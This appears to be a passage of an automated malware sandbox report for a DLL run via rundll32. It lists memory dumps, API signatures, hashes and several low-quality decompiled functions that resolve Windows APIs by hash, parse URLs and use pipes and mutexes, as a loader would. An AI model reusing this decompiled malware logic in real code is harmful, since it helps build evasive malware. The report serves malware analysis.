                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.765331866.00007FFE35481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFE35480000, based on PE: true
                  • Associated: 00000004.00000002.765324849.00007FFE35480000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765340158.00007FFE35482000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765346850.00007FFE35483000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000004.00000002.765488940.00007FFE35505000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffe35480000_rundll32.jbxd
                  Similarity
                  • API ID: BufferConsoleFlushInput
                  • String ID: &$4$A$F$G$U$b$f$p
                  • API String ID: 320419523-419958901
                  • Opcode ID: fa8f94597c9c47fd8ebf90b9832bf50eaebafc27a4ef202f10f88f75cc5c3941
                  • Instruction ID: 0d9c995824fcc9ca03b58b798c7f2a4c49cf89718e3dfcc85be87e6cd0c2790d
                  • Opcode Fuzzy Hash: fa8f94597c9c47fd8ebf90b9832bf50eaebafc27a4ef202f10f88f75cc5c3941
                  • Instruction Fuzzy Hash: 6611B262C1C7C285F3664324A45C33F6E908753B08F1920A7E3C705EDAD6AFD548AB13
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
